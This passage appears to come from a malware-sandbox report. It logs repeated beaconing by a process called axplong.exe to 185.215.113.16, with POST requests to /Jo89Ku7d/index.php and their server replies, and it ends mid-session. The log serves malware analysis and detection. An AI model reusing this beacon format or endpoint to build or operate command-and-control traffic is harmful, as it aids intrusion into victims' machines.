                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:07.496052027 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.455654185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:07.618197918 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:08.331146002 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:08.332066059 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:08.563980103 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.455655185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:08.681051970 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:09.375256062 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:09.376321077 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:09.599627018 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.455656185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:09.758709908 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:10.474226952 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:10.475132942 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:10.709074974 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.455657185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:10.823120117 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:11.549422026 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:11.551275969 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:11.780131102 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.455658185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:11.905811071 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:12.620748997 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:12.623521090 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:12.857176065 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.455659185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:12.977821112 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:13.686417103 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:13.687414885 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:13.933962107 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.455660185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:14.055573940 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:14.782094002 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:14.784502029 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:15.020087957 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.455661185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:15.134735107 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:15.853360891 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:15.854372978 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:16.089590073 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.455662185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:16.211677074 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:16.939333916 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:16.940506935 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:17.173333883 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.455663185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:17.290596008 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:18.010824919 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:18.011984110 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:18.243854046 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.455664185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:18.353413105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:19.070374012 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:19.071213007 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:19.303478956 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.455665185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:19.415422916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:20.113703966 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:20.114624977 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
